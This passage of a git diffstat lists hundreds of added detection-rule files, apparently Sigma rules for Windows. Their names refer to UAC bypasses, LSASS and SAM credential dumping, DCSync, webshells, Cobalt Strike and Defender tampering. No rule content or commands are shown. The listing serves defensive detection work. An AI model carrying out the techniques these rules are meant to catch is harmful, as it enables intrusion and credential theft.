...eation_win_tscon_rdp_session_hijacking.yml | 27 + ..._creation_win_uac_bypass_changepk_slui.yml | 33 + .../proc_creation_win_uac_bypass_cmstp.yml | 43 + ...eation_win_uac_bypass_computerdefaults.yml | 34 + ...eation_win_uac_bypass_consent_comctl32.yml | 31 + .../proc_creation_win_uac_bypass_dismhost.yml | 33 + ...on_win_uac_bypass_eventvwr_recentviews.yml | 34 + ...proc_creation_win_uac_bypass_fodhelper.yml | 31 + .../proc_creation_win_uac_bypass_ieinstal.yml | 32 + ...c_creation_win_uac_bypass_msconfig_gui.yml | 31 + ...tion_win_uac_bypass_ntfs_reparse_point.yml | 41 + ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 31 + .../proc_creation_win_uac_bypass_sdclt.yml | 29 + 
...oc_creation_win_uac_bypass_trustedpath.yml | 27 + .../proc_creation_win_uac_bypass_wmp.yml | 36 + .../proc_creation_win_uac_bypass_wsreset.yml | 36 + ...win_uac_bypass_wsreset_integrity_level.yml | 32 + ...c_creation_win_ultravnc_susp_execution.yml | 33 + ...ation_win_uninstall_crowdstrike_falcon.yml | 29 + ..._win_userinit_uncommon_child_processes.yml | 55 + .../proc_creation_win_vaultcmd_list_creds.yml | 29 + .../proc_creation_win_verclsid_runs_com.yml | 35 + ...proc_creation_win_virtualbox_execution.yml | 40 + ...n_win_virtualbox_vboxdrvinst_execution.yml | 38 + ...ion_win_vmware_toolbox_cmd_persistence.yml | 35 + ...in_vmware_toolbox_cmd_persistence_susp.yml | 42 + ...win_vmware_vmtoolsd_susp_child_process.yml | 61 + ...n_win_vscode_child_processes_anomalies.yml | 57 + ...c_creation_win_vscode_tunnel_execution.yml | 40 + ...eation_win_vscode_tunnel_remote_shell_.yml | 39 + ...on_win_vscode_tunnel_renamed_execution.yml | 54 + ...tion_win_vscode_tunnel_service_install.yml | 31 + ...tion_win_vsdiagnostics_execution_proxy.yml | 32 + ..._win_vslsagent_agentextensionpath_load.yml | 31 + .../proc_creation_win_w32tm.yml | 34 + ...ab_execution_from_non_default_location.yml | 35 + .../proc_creation_win_wab_unusual_parents.yml | 40 + ...n_win_wbadmin_delete_systemstatebackup.yml | 35 + ...proc_creation_win_webdav_lnk_execution.yml | 38 + .../proc_creation_win_webshell_chopper.yml | 39 + .../proc_creation_win_webshell_hacking.yml | 104 + ..._webshell_recon_commands_and_processes.yml | 106 + ...ll_susp_process_spawned_from_webserver.yml | 91 + .../proc_creation_win_webshell_tool_recon.yml | 56 + ...reation_win_werfault_lsass_shtinkering.yml | 45 + ...ion_win_werfault_reflect_debugger_exec.yml | 33 + ...creation_win_wermgr_susp_child_process.yml | 50 + ...creation_win_wermgr_susp_exec_location.yml | 35 + ...c_creation_win_wget_download_direct_ip.yml | 64 + ...get_download_susp_file_sharing_domains.yml | 90 + ..._creation_win_where_browser_data_recon.yml | 45 + 
...proc_creation_win_whoami_all_execution.yml | 33 + .../proc_creation_win_whoami_execution.yml | 31 + ...hoami_execution_from_high_priv_process.yml | 37 + ...c_creation_win_whoami_groups_discovery.yml | 30 + .../proc_creation_win_whoami_output.yml | 36 + ...roc_creation_win_whoami_parent_anomaly.yml | 45 + ...roc_creation_win_whoami_priv_discovery.yml | 32 + ...ion_win_windows_terminal_susp_children.yml | 69 + ..._creation_win_winget_add_custom_source.yml | 37 + ..._win_winget_add_insecure_custom_source.yml | 40 + ...tion_win_winget_add_susp_custom_source.yml | 41 + ..._win_winget_local_install_via_manifest.yml | 41 + ...oc_creation_win_winrar_exfil_dmp_files.yml | 38 + ...creation_win_winrar_susp_child_process.yml | 49 + ...n_win_winrar_uncommon_folder_execution.yml | 39 + .../proc_creation_win_winrm_awl_bypass.yml | 36 + ..._execution_via_scripting_api_winrm_vbs.yml | 35 + ...inrm_remote_powershell_session_process.yml | 32 + ..._creation_win_winrm_susp_child_process.yml | 37 + ...eation_win_winzip_password_compression.yml | 34 + ..._wmi_backdoor_exchange_transport_agent.yml | 32 + ..._wmi_persistence_script_event_consumer.yml | 29 + ...eation_win_wmic_eventconsumer_creation.yml | 32 + ...c_creation_win_wmic_namespace_defender.yml | 31 + ...roc_creation_win_wmic_process_creation.yml | 37 + ...creation_win_wmic_recon_computersystem.yml | 30 + ...proc_creation_win_wmic_recon_csproduct.yml | 30 + .../proc_creation_win_wmic_recon_group.yml | 33 + .../proc_creation_win_wmic_recon_hotfix.yml | 30 + .../proc_creation_win_wmic_recon_process.yml | 35 + .../proc_creation_win_wmic_recon_product.yml | 30 + ..._creation_win_wmic_recon_product_class.yml | 33 + .../proc_creation_win_wmic_recon_service.yml | 36 + ...on_win_wmic_recon_system_info_uncommon.yml | 44 + ...win_wmic_recon_unquoted_service_search.yml | 38 + ...roc_creation_win_wmic_remote_execution.yml | 38 + ...creation_win_wmic_service_manipulation.yml | 34 + ...oc_creation_win_wmic_squiblytwo_bypass.yml | 46 + 
...wmic_susp_execution_via_office_process.yml | 68 + ...reation_win_wmic_susp_process_creation.yml | 59 + ...reation_win_wmic_terminate_application.yml | 34 + ...reation_win_wmic_uninstall_application.yml | 34 + ...n_win_wmic_uninstall_security_products.yml | 89 + ...reation_win_wmic_xsl_script_processing.yml | 44 + ...creation_win_wmiprvse_spawning_process.yml | 45 + ...reation_win_wmiprvse_spawns_powershell.yml | 41 + ...tion_win_wmiprvse_susp_child_processes.yml | 68 + ...ation_win_wpbbin_potential_persistence.yml | 27 + ...eation_win_wscript_cscript_script_exec.yml | 41 + ...n_wscript_cscript_susp_child_processes.yml | 54 + ...script_cscript_uncommon_extension_exec.yml | 45 + ...tion_win_wsl_child_processes_anomalies.yml | 54 + ...proc_creation_win_wsl_lolbin_execution.yml | 54 + .../proc_creation_win_wuauclt_dll_loading.yml | 52 + ...ion_win_wuauclt_no_cli_flags_execution.yml | 32 + ...creation_win_wusa_cab_files_extraction.yml | 25 + ...a_cab_files_extraction_from_susp_paths.yml | 35 + ...reation_win_wusa_susp_parent_execution.yml | 45 + .../registry_add_malware_netwire.yml | 31 + .../registry_add_malware_ursnif.yml | 34 + ...egistry_add_persistence_amsi_providers.yml | 34 + ...gistry_add_persistence_com_key_linking.yml | 34 + ...persistence_disk_cleanup_handler_entry.yml | 68 + ...e_logon_scripts_userinitmprlogonscript.yml | 28 + ...dd_pua_sysinternals_execution_via_eula.yml | 28 + ...ysinternals_renamed_execution_via_eula.yml | 71 + ...a_sysinternals_susp_execution_via_eula.yml | 43 + .../registry_event_add_local_hidden_user.yml | 28 + .../registry_event_apt_leviathan.yml | 24 + ...registry_event_apt_oceanlotus_registry.yml | 43 + .../registry_event_apt_oilrig_mar18.yml | 42 + .../registry_event_apt_pandemic.yml | 34 + .../registry_event_bypass_via_wsreset.yml | 33 + ...stry_event_cmstp_execution_by_registry.yml | 33 + ...y_events_logging_adding_reg_key_minint.yml | 35 + ...event_disable_wdigest_credential_guard.yml | 29 + 
...entutl_volume_shadow_copy_service_keys.yml | 29 + .../registry_event_hack_wce_reg.yml | 27 + ...t_hybridconnectionmgr_svc_installation.yml | 29 + .../registry_event_mal_azorult.yml | 34 + .../registry_event_mal_flowcloud.yml | 30 + ...registry_event_malware_qakbot_registry.yml | 25 + ...gistry_event_mimikatz_printernightmare.yml | 47 + ...y_event_modify_screensaver_binary_path.yml | 32 + ...ry_event_narrator_feedback_persistance.yml | 29 + .../registry_event_net_ntlm_downgrade.yml | 34 + ..._dll_added_to_appcertdlls_registry_key.yml | 36 + ...dll_added_to_appinit_dlls_registry_key.yml | 33 + .../registry_event_office_test_regadd.yml | 26 + ...event_office_trust_record_modification.yml | 31 + ...registry_event_persistence_recycle_bin.yml | 32 + .../registry_event_portproxy_registry_key.yml | 31 + .../registry_event_redmimicry_winnti_reg.yml | 26 + .../registry_event_runkey_winekey.yml | 31 + .../registry_event_runonce_persistence.yml | 36 + ...try_event_shell_open_keys_manipulation.yml | 42 + ...registry_event_silentprocessexit_lsass.yml | 30 + .../registry_event_ssp_added_lsa_config.yml | 32 + ...registry_event_stickykey_like_backdoor.yml | 38 + .../registry_event_susp_atbroker_change.yml | 38 + .../registry_event_susp_download_run_key.yml | 30 + .../registry_event_susp_lsass_dll_load.yml | 35 + .../registry_event_susp_mic_cam_access.yml | 41 + ...gistry_set_enable_anonymous_connection.yml | 26 + ...stry_set_add_load_service_in_safe_mode.yml | 36 + .../registry_set_add_port_monitor.yml | 43 + .../registry_set_aedebug_persistence.yml | 29 + ...et_allow_rdp_remote_assistance_feature.yml | 27 + .../registry_set_amsi_com_hijack.yml | 29 + ...set_asep_reg_keys_modification_classes.yml | 64 + ..._set_asep_reg_keys_modification_common.yml | 78 + ...eg_keys_modification_currentcontrolset.yml | 70 + ...p_reg_keys_modification_currentversion.yml | 149 + ...eg_keys_modification_currentversion_nt.yml | 91 + ...eg_keys_modification_internet_explorer.yml | 57 + 
..._set_asep_reg_keys_modification_office.yml | 82 + ..._reg_keys_modification_session_manager.yml | 48 + ...p_reg_keys_modification_system_scripts.yml | 45 + ...et_asep_reg_keys_modification_winsock2.yml | 45 + ...asep_reg_keys_modification_wow6432node.yml | 107 + ..._keys_modification_wow6432node_classes.yml | 53 + ...odification_wow6432node_currentversion.yml | 46 + .../registry_set_bginfo_custom_db.yml | 26 + .../registry_set_bginfo_custom_vbscript.yml | 30 + .../registry_set_bginfo_custom_wmi_query.yml | 30 + .../registry_set_blackbyte_ransomware.yml | 31 + ...y_set_bypass_uac_using_delegateexecute.yml | 30 + ...istry_set_bypass_uac_using_eventviewer.yml | 29 + ...et_bypass_uac_using_silentcleanup_task.yml | 29 + .../registry_set_change_rdp_port.yml | 31 + .../registry_set_change_security_zones.yml | 35 + ...stry_set_change_sysmon_driver_altitude.yml | 28 + ...gistry_set_change_winevt_channelaccess.yml | 37 + .../registry_set_chrome_extension.yml | 135 + .../registry_set_clickonce_trust_prompt.yml | 34 + ...stry_set_cobaltstrike_service_installs.yml | 42 + .../registry_set_comhijack_sdclt.yml | 28 + .../registry_set_crashdump_disabled.yml | 27 + ...istry_set_creation_service_susp_folder.yml | 52 + ...y_set_creation_service_uncommon_folder.yml | 48 + ...file_open_handler_powershell_execution.yml | 29 + ...try_set_cve_2020_1048_new_printer_port.yml | 34 + ...gistry_set_cve_2022_30190_msdt_follina.yml | 27 + ...try_set_dbgmanageddebugger_persistence.yml | 29 + .../registry_set_defender_exclusions.yml | 29 + ...registry_set_desktop_background_change.yml | 51 + ...pervisorenforcedcodeintegrity_disabled.yml | 32 + .../registry_set_dhcp_calloutdll.yml | 31 + ...istry_set_disable_administrative_share.yml | 30 + ...gistry_set_disable_autologger_sessions.yml | 37 + ...registry_set_disable_defender_firewall.yml | 31 + .../registry_set_disable_function_user.yml | 48 + ...stry_set_disable_macroruntimescanscope.yml | 32 + ...et_disable_privacy_settings_experience.yml | 27 + 
..._disable_security_center_notifications.yml | 27 + .../registry_set_disable_system_restore.yml | 32 + .../registry_set_disable_uac_registry.yml | 28 + ...y_set_disable_windows_defender_service.yml | 28 + .../registry_set_disable_windows_firewall.yml | 29 + .../registry_set_disable_winevt_logging.yml | 49 + ...it_guard_net_protection_on_ms_defender.yml | 27 + ...t_disabled_microsoft_defender_eventlog.yml | 27 + ...d_pua_protection_on_microsoft_defender.yml | 27 + ...amper_protection_on_microsoft_defender.yml | 32 + .../registry_set_disallowrun_execution.yml | 27 + ...sk_cleanup_handler_autorun_persistence.yml | 52 + .../registry_set_dns_over_https_enabled.yml | 40 + ...gistry_set_dns_server_level_plugin_dll.yml | 33 + .../registry_set_dot_net_etw_tamper.yml | 48 + ...et_enabling_cor_profiler_env_variables.yml | 34 + .../registry_set_enabling_turnoffcheck.yml | 27 + .../registry_set_evtx_file_key_tamper.yml | 29 + ...ry_set_exploit_guard_susp_allowed_apps.yml | 33 + .../registry_set_fax_change_service_user.yml | 29 + .../registry_set_fax_dll_persistance.yml | 31 + .../registry_set_file_association_exefile.yml | 26 + ...egistry_set_hangs_debugger_persistence.yml | 26 + .../registry_set_hhctrl_persistence.yml | 28 + .../registry_set_hidden_extention.yml | 32 + .../registry_set/registry_set_hide_file.yml | 29 + .../registry_set_hide_function_user.yml | 37 + ...t_hide_scheduled_task_via_index_tamper.yml | 36 + ...urity_zone_protocol_defaults_downgrade.yml | 35 + ...registry_set_ime_non_default_extension.yml | 35 + .../registry_set_ime_suspicious_paths.yml | 51 + ...stry_set_install_root_or_ca_certificat.yml | 38 + ...t_explorer_disable_first_run_customize.yml | 35 + .../registry_set_legalnotice_susp_message.yml | 32 + ...y_set_lolbin_onedrivestandaloneupdater.yml | 28 + ...egistry_set_lsa_disablerestrictedadmin.yml | 33 + .../registry_set_lsass_usermode_dumping.yml | 31 + .../registry_set/registry_set_mal_adwind.yml | 30 + .../registry_set_mal_blue_mockingbird.yml | 30 
+ ...istry_set_net_cli_ngenassemblyusagelog.yml | 29 + ...tsh_help_dll_persistence_susp_location.yml | 52 + ...netsh_helper_dll_potential_persistence.yml | 33 + ...registry_set_new_application_appcompat.yml | 29 + .../registry_set_new_network_provider.yml | 39 + .../registry_set_odbc_driver_registered.yml | 37 + ...gistry_set_odbc_driver_registered_susp.yml | 52 + ...registry_set_office_access_vbom_tamper.yml | 32 + ...office_disable_protected_view_features.yml | 46 + .../registry_set_office_enable_dde.yml | 34 + ...ook_enable_load_macro_provider_on_boot.yml | 31 + ..._office_outlook_enable_macro_execution.yml | 31 + ...utlook_enable_unsafe_client_mail_rules.yml | 33 + ...y_set_office_outlook_security_settings.yml | 32 + ..._set_office_trust_record_susp_location.yml | 38 + ...y_set_office_trusted_location_uncommon.yml | 48 + ...egistry_set_office_vba_warnings_tamper.yml | 32 + ...ce_app_cpmpat_layer_registerapprestart.yml | 29 + .../registry_set_persistence_app_paths.yml | 54 + ...registry_set_persistence_appx_debugger.yml | 31 + .../registry_set_persistence_autodial_dll.yml | 26 + .../registry_set_persistence_chm.yml | 28 + ...rsistence_com_hijacking_susp_locations.yml | 40 + ..._persistence_comhijack_psfactorybuffer.yml | 33 + ...et_persistence_custom_protocol_handler.yml | 38 + ...et_persistence_event_viewer_events_asp.yml | 46 + .../registry_set_persistence_globalflags.yml | 43 + .../registry_set_persistence_ie.yml | 44 + .../registry_set_persistence_ifilter.yml | 72 + ...registry_set_persistence_lsa_extension.yml | 28 + .../registry_set_persistence_mpnotify.yml | 26 + .../registry_set_persistence_mycomputer.yml | 26 + ...istry_set_persistence_natural_language.yml | 36 + .../registry_set_persistence_office_vsto.yml | 49 + ...istry_set_persistence_outlook_homepage.yml | 36 + ...stry_set_persistence_outlook_todaypage.yml | 40 + ...gistry_set_persistence_reflectdebugger.yml | 30 + .../registry_set_persistence_scrobj_dll.yml | 27 + 
.../registry_set_persistence_search_order.yml | 94 + ...registry_set_persistence_shim_database.yml | 34 + ...istence_shim_database_susp_application.yml | 38 + ...stence_shim_database_uncommon_location.yml | 32 + .../registry_set_persistence_typed_paths.yml | 30 + .../registry_set_persistence_xll.yml | 30 + ...istry_set_policies_associations_tamper.yml | 42 + ...gistry_set_policies_attachments_tamper.yml | 35 + .../registry_set_powershell_as_service.yml | 30 + ...y_set_powershell_enablescripts_enabled.yml | 28 + ...gistry_set_powershell_execution_policy.yml | 42 + .../registry_set_powershell_in_run_keys.yml | 48 + ...gistry_set_powershell_logging_disabled.yml | 36 + ...egistry_set_provisioning_command_abuse.yml | 35 + ...set_renamed_sysinternals_eula_accepted.yml | 60 + .../registry_set_rpcrt4_etw_tamper.yml | 31 + ...stry_set_scr_file_executed_by_rundll32.yml | 35 + .../registry_set_servicedll_hijack.yml | 38 + .../registry_set_services_etw_tamper.yml | 28 + .../registry_set_set_nopolicies_user.yml | 37 + .../registry_set_sip_persistence.yml | 46 + .../registry_set_sophos_av_tamper.yml | 30 + .../registry_set_special_accounts.yml | 32 + ...ry_set_suppress_defender_notifications.yml | 27 + ...registry_set_susp_keyboard_layout_load.yml | 34 + ...y_set_susp_pendingfilerenameoperations.yml | 38 + .../registry_set_susp_printer_driver.yml | 38 + ...stry_set_susp_reg_persist_explorer_run.yml | 34 + .../registry_set_susp_run_key_img_folder.yml | 45 + .../registry_set_susp_service_installed.yml | 40 + .../registry_set_susp_user_shell_folders.yml | 28 + .../registry_set_suspicious_env_variables.yml | 64 + .../registry_set_system_lsa_nolmhash.yml | 33 + .../registry_set_taskcache_entry.yml | 59 + .../registry_set_telemetry_persistence.yml | 53 + ...egistry_set_terminal_server_suspicious.yml | 42 + ...registry_set_terminal_server_tampering.yml | 66 + .../registry_set_timeproviders_dllname.yml | 33 + ...y_set_tls_protocol_old_version_enabled.yml | 28 + 
.../registry_set_treatas_persistence.yml | 42 + .../registry_set_turn_on_dev_features.yml | 35 + .../registry_set_uac_bypass_eventvwr.yml | 29 + .../registry_set_uac_bypass_sdclt.yml | 32 + .../registry_set_uac_bypass_winsat.yml | 30 + .../registry_set_uac_bypass_wmp.yml | 28 + .../registry_set_vbs_payload_stored.yml | 44 + .../registry_set_wab_dllpath_reg_change.yml | 30 + ..._set_wdigest_enable_uselogoncredential.yml | 29 + .../registry_set_windows_defender_tamper.yml | 65 + ...ry_set_winget_admin_settings_tampering.yml | 29 + ...istry_set_winget_enable_local_manifest.yml | 27 + ...set_winlogon_allow_multiple_tssessions.yml | 31 + .../registry_set_winlogon_notify_key.yml | 29 + .../win_security_access_token_abuse.yml | 32 + .../win_security_admin_rdp_login.yml | 32 + ...y_diagtrack_eop_default_login_username.yml | 25 + ...er_added_security_enabled_global_group.yml | 33 + ..._removed_security_enabled_global_group.yml | 33 + .../win_security_overpass_the_hash.yml | 29 + .../win_security_pass_the_hash_2.yml | 38 + .../win_security_rdp_bluekeep_poc_scanner.yml | 28 + .../win_security_rdp_localhost_login.yml | 30 + ...scrcons_remote_wmi_scripteventconsumer.yml | 31 + ..._security_enabled_global_group_deleted.yml | 33 + ...y_successful_external_remote_rdp_login.yml | 47 + ...y_successful_external_remote_smb_login.yml | 47 + .../win_security_susp_failed_logon_source.yml | 56 + .../win_security_susp_krbrelayup.yml | 30 + ...win_security_susp_logon_newcredentials.yml | 26 + .../win_security_susp_rottenpotato.yml | 32 + .../win_security_susp_wmi_login.yml | 24 + ...in_security_wfp_endpoint_agent_blocked.yml | 99 + ...rity_aadhealth_mon_agent_regkey_access.yml | 39 + ...rity_aadhealth_svc_agent_regkey_access.yml | 41 + ...ecurity_account_backdoor_dcsync_rights.yml | 37 + .../win_security_account_discovery.yml | 43 + ...win_security_ad_object_writedac_access.yml | 32 + ...ity_ad_replication_non_machine_account.yml | 39 + .../win_security_ad_user_enumeration.yml | 46 + 
...e_template_configuration_vulnerability.yml | 32 + ...mplate_configuration_vulnerability_eku.yml | 46 + .../win_security_add_remove_computer.yml | 28 + .../win_security_admin_share_access.yml | 27 + ...ty_alert_active_directory_user_control.yml | 28 + .../win_security_alert_ad_user_backdoors.yml | 41 + ..._security_alert_enable_weak_encryption.yml | 92 + .../security/win_security_alert_ruler.yml | 39 + .../security/win_security_atsvc_task.yml | 32 + .../win_security_audit_log_cleared.yml | 38 + .../win_security_camera_microphone_access.yml | 32 + ...security_cobaltstrike_service_installs.yml | 48 + ...n_security_codeintegrity_check_failure.yml | 26 + ...ecurity_dce_rpc_smb_spoolss_named_pipe.yml | 29 + .../win_security_dcom_iertutil_dll_hijack.yml | 29 + .../builtin/security/win_security_dcsync.yml | 45 + ...n_security_device_installation_blocked.yml | 25 + .../win_security_disable_event_auditing.yml | 54 + ...curity_disable_event_auditing_critical.yml | 53 + .../win_security_dot_net_etw_tamper.yml | 48 + ...rity_dpapi_domain_backupkey_extraction.yml | 28 + ..._dpapi_domain_masterkey_backup_attempt.yml | 29 + .../security/win_security_external_device.yml | 28 + .../win_security_gpo_scheduledtasks.yml | 33 + .../win_security_hidden_user_creation.yml | 26 + .../security/win_security_hktl_nofilter.yml | 34 + ...y_hybridconnectionmgr_svc_installation.yml | 28 + .../security/win_security_impacket_psexec.yml | 31 + .../win_security_impacket_secretdump.yml | 32 + ...oke_obfuscation_clip_services_security.yml | 36 + ...ation_obfuscated_iex_services_security.yml | 37 + ...ke_obfuscation_stdin_services_security.yml | 42 + ...voke_obfuscation_var_services_security.yml | 41 + ...scation_via_compress_services_security.yml | 38 + ...fuscation_via_rundll_services_security.yml | 36 + ...bfuscation_via_stdin_services_security.yml | 38 + ...scation_via_use_clip_services_security.yml | 32 + ...cation_via_use_mshta_services_security.yml | 36 + 
...ion_via_use_rundll32_services_security.yml | 41 + ..._obfuscation_via_var_services_security.yml | 46 + .../security/win_security_iso_mount.yml | 37 + .../security/win_security_lm_namedpipe.yml | 49 + ...curity_lsass_access_non_system_account.yml | 60 + .../security/win_security_mal_creddumper.yml | 44 + .../win_security_mal_service_installs.yml | 37 + .../security/win_security_mal_wceaux_dll.yml | 32 + ...win_security_metasploit_authentication.yml | 34 + ...or_impacket_smb_psexec_service_install.yml | 44 + ...cobaltstrike_getsystem_service_install.yml | 50 + .../win_security_net_ntlm_downgrade.yml | 39 + ...ecurity_net_share_obj_susp_desktop_ini.yml | 33 + ..._renamed_user_account_with_dollar_sign.yml | 32 + .../win_security_not_allowed_rdp_access.yml | 31 + ...in_security_password_policy_enumerated.yml | 26 + .../security/win_security_pcap_drivers.yml | 44 + .../win_security_petitpotam_network_share.yml | 31 + ...n_security_petitpotam_susp_tgt_request.yml | 39 + .../win_security_possible_dc_shadow.yml | 36 + ...powershell_script_installed_as_service.yml | 32 + ...urity_protected_storage_service_access.yml | 27 + .../win_security_rdp_reverse_tunnel.yml | 47 + ...y_register_new_logon_process_by_rubeus.yml | 27 + ...ty_registry_permissions_weakness_check.yml | 35 + ...win_security_remote_powershell_session.yml | 29 + .../win_security_replay_attack_detected.yml | 25 + ...urity_sam_registry_hive_handle_request.yml | 35 + ...n_security_scm_database_handle_failure.yml | 32 + ...rity_scm_database_privileged_operation.yml | 31 + ...service_install_remote_access_software.yml | 53 + ..._service_installation_by_unusal_client.yml | 34 + ...ecurity_smb_file_creation_admin_shares.yml | 30 + .../win_security_susp_add_domain_trust.yml | 22 + .../win_security_susp_add_sid_history.yml | 35 + .../win_security_susp_computer_name.yml | 40 + ...win_security_susp_dsrm_password_change.yml | 25 + ...win_security_susp_failed_logon_reasons.yml | 40 + 
...in_security_susp_kerberos_manipulation.yml | 58 + .../win_security_susp_ldap_dataexchange.yml | 33 + ...security_susp_local_anon_logon_created.yml | 29 + ...curity_susp_logon_explicit_credentials.yml | 39 + .../security/win_security_susp_lsass_dump.yml | 28 + .../win_security_susp_lsass_dump_generic.yml | 117 + .../win_security_susp_net_recon_activity.yml | 36 + ...win_security_susp_opened_encrypted_zip.yml | 27 + ...ity_susp_opened_encrypted_zip_filename.yml | 38 + ...rity_susp_opened_encrypted_zip_outlook.yml | 29 + ...rity_susp_outbound_kerberos_connection.yml | 40 + ...susp_possible_shadow_credentials_added.yml | 37 + .../security/win_security_susp_psexec.yml | 33 + ...n_security_susp_raccess_sensitive_fext.yml | 45 + .../win_security_susp_rc4_kerberos.yml | 31 + ..._security_susp_scheduled_task_creation.yml | 64 + ..._susp_scheduled_task_delete_or_disable.yml | 51 + ...in_security_susp_scheduled_task_update.yml | 66 + .../security/win_security_susp_sdelete.yml | 38 + .../win_security_susp_time_modification.yml | 36 + .../win_security_svcctl_remote_service.yml | 30 + .../win_security_syskey_registry_access.yml | 33 + ...rity_sysmon_channel_reference_deletion.yml | 39 + .../win_security_tap_driver_installation.yml | 28 + ...security_teams_suspicious_objectaccess.yml | 30 + ...iles_with_cred_data_via_network_shares.yml | 39 + ...ity_user_added_to_local_administrators.yml | 31 + ...l_priv_service_lsaregisterlogonprocess.yml | 28 + .../security/win_security_user_creation.yml | 30 + .../win_security_user_driver_loaded.yml | 55 + .../security/win_security_user_logoff.yml | 25 + ..._vssaudit_secevent_source_registration.yml | 28 + ..._defender_exclusions_registry_modified.yml | 33 + ...ndows_defender_exclusions_write_access.yml | 38 + ...dows_defender_exclusions_write_deleted.yml | 33 + .../security/win_security_wmi_persistence.yml | 32 + ..._security_wmiprvse_wbemcomn_dll_hijack.yml | 30 + .../win_security_workstation_was_locked.yml | 49 + 
...mitigations_defender_load_unsigned_dll.yml | 30 + ...ations_unsigned_dll_from_susp_location.yml | 34 + .../win_hybridconnectionmgr_svc_running.yml | 33 + ...win_shell_core_susp_packages_installed.yml | 37 + ...lient_security_susp_failed_guest_logon.yml | 32 + .../win_system_application_sysmon_crash.yml | 24 + .../lsasrv/win_system_lsasrv_ntlmv1.yml | 29 + .../win_system_susp_dhcp_config.yml | 28 + .../win_system_susp_dhcp_config_failed.yml | 31 + .../win_system_exploit_cve_2021_42287.yml | 36 + .../win_system_lpe_indicators_tabtip.yml | 29 + .../win_system_eventlog_cleared.yml | 45 + .../win_system_susp_eventlog_cleared.yml | 39 + ...stem_kdcsvc_cert_use_no_strong_mapping.yml | 30 + .../win_system_kdcsvc_rc4_downgrade.yml | 25 + ...rkspwdump_clearing_hive_access_history.yml | 26 + .../win_system_susp_sam_dump.yml | 29 + .../win_system_volume_shadow_copy_mount.yml | 27 + ..._vuln_cve_2022_21919_or_cve_2021_34484.yml | 25 + .../win_system_susp_system_update_error.yml | 30 + ...gon_exploitation_using_wellknown_tools.yml | 29 + .../netlogon/win_system_vul_cve_2020_1472.yml | 28 + .../ntfs/win_system_ntfs_vuln_exploit.yml | 32 + ...n_system_cobaltstrike_service_installs.yml | 45 + .../win_system_defender_disabled.yml | 38 + .../win_system_hack_smbexec.yml | 36 + ...ystem_invoke_obfuscation_clip_services.yml | 32 + ...ke_obfuscation_obfuscated_iex_services.yml | 33 + ...stem_invoke_obfuscation_stdin_services.yml | 42 + ...system_invoke_obfuscation_var_services.yml | 38 + ...voke_obfuscation_via_compress_services.yml | 35 + ...invoke_obfuscation_via_rundll_services.yml | 33 + ..._invoke_obfuscation_via_stdin_services.yml | 36 + ...voke_obfuscation_via_use_clip_services.yml | 29 + ...oke_obfuscation_via_use_mshta_services.yml | 31 + ..._obfuscation_via_use_rundll32_services.yml | 38 + ...em_invoke_obfuscation_via_var_services.yml | 43 + ...system_krbrelayup_service_installation.yml | 26 + .../win_system_mal_creddumper.yml | 41 + 
...tstrike_getsystem_service_installation.yml | 47 + .../win_system_moriya_rootkit.yml | 28 + ...powershell_script_installed_as_service.yml | 29 + .../win_system_service_install_anydesk.yml | 25 + .../win_system_service_install_csexecsvc.yml | 29 + .../win_system_service_install_hacktools.yml | 41 + .../win_system_service_install_mesh_agent.yml | 28 + ...tem_service_install_netsupport_manager.yml | 35 + .../win_system_service_install_paexec.yml | 28 + .../win_system_service_install_pdqdeploy.yml | 32 + ...ystem_service_install_pdqdeploy_runner.yml | 30 + ...ystem_service_install_pua_proceshacker.yml | 30 + .../win_system_service_install_remcom.yml | 28 + ...service_install_remote_access_software.yml | 55 + ...ystem_service_install_remote_utilities.yml | 37 + .../win_system_service_install_sliver.yml | 34 + ...tem_service_install_sups_unusal_client.yml | 30 + .../win_system_service_install_susp.yml | 41 + ...em_service_install_sysinternals_psexec.yml | 31 + ...win_system_service_install_tacticalrmm.yml | 28 + .../win_system_service_install_tap_driver.yml | 25 + .../win_system_service_install_uncommon.yml | 51 + ...ystem_service_terminated_error_generic.yml | 27 + ...tem_service_terminated_error_important.yml | 46 + ...system_service_terminated_unexpectedly.yml | 31 + ...n_system_susp_rtcore64_service_install.yml | 25 + ...ystem_susp_service_installation_folder.yml | 34 + ...sp_service_installation_folder_pattern.yml | 29 + ...ystem_susp_service_installation_script.yml | 40 + ...win_system_rdp_potential_cve_2019_0708.yml | 31 + ...cheduler_execution_from_susp_locations.yml | 37 + ...er_lolbin_execution_via_task_scheduler.yml | 39 + ...win_taskscheduler_susp_schtasks_delete.yml | 41 + .../win_terminalservices_rdp_ngrok.yml | 26 + .../posh_pc_alternate_powershell_hosts.yml | 44 + .../posh_pm_susp_netfirewallrule_recon.yml | 37 + .../posh_ps_compress_archive_usage.yml | 32 + .../posh_ps_mailbox_access.yml | 29 + .../posh_ps_new_smbmapping_quic.yml | 36 + 
.../posh_ps_registry_reconnaissance.yml | 34 + .../posh_ps_remove_item_path.yml | 38 + .../posh_ps_win_api_functions_access.yml | 44 + .../posh_ps_win_api_library_access.yml | 75 + .../proc_creation_win_csc_compilation.yml | 33 + .../proc_creation_win_curl_download.yml | 40 + .../proc_creation_win_curl_execution.yml | 32 + .../proc_creation_win_curl_fileupload.yml | 43 + .../proc_creation_win_curl_useragent.yml | 37 + ...roc_creation_win_dfsvc_child_processes.yml | 27 + ..._creation_win_diskshadow_child_process.yml | 40 + ...oc_creation_win_diskshadow_script_mode.yml | 45 + ...oc_creation_win_findstr_password_recon.yml | 39 + .../proc_creation_win_net_quic.yml | 37 + ...roc_creation_win_office_svchost_parent.yml | 38 + ...n_powershell_abnormal_commandline_size.yml | 36 + ...eation_win_powershell_crypto_namespace.yml | 48 + ..._creation_win_powershell_import_module.yml | 43 + ...on_win_regsvr32_dllregisterserver_exec.yml | 58 + ...reation_win_rundll32_dllregisterserver.yml | 42 + ...c_creation_win_susp_compression_params.yml | 41 + ...reation_win_susp_elevated_system_shell.yml | 44 + ...proc_creation_win_susp_event_log_query.yml | 51 + ...win_susp_file_permission_modifications.yml | 57 + .../proc_creation_win_taskkill_execution.yml | 39 + ...oc_creation_win_wmic_recon_system_info.yml | 70 + ...registry_event_scheduled_task_creation.yml | 33 + .../registry_set_office_trusted_location.yml | 38 + ...gistry_set_powershell_crypto_namespace.yml | 48 + .../win_security_scheduled_task_deletion.yml | 34 + .../posh_ps_cl_invocation_lolscript_count.yml | 32 + ...h_ps_cl_mutexverifiers_lolscript_count.yml | 32 + ..._correlation_apt_silence_downloader_v3.yml | 43 + ..._correlation_apt_turla_commands_medium.yml | 37 + 